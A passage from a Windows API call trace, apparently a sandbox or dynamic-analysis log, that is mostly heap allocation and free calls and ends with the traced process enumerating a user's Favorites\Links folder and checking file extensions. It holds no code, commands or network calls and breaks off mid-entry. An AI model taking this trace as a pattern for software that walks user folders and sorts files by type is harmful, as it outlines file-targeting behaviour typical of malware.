[0188.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0188.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.010] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Links\\") returned="Links\\" [0189.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38f88 [0189.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.011] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0189.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0189.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38f88 | out: hHeap=0x6a0000) returned 1 [0189.011] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0189.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.012] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0189.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.012] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0189.012] PathFindFileNameW (pszPath="") returned="" [0189.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.012] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0189.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.013] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0189.013] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0189.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x76) returned 0x723d10 [0189.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.013] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Links\\desktop.ini") returned=".ini" [0189.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x723d10 | out: hHeap=0x6a0000) returned 1 [0189.014] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0189.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: 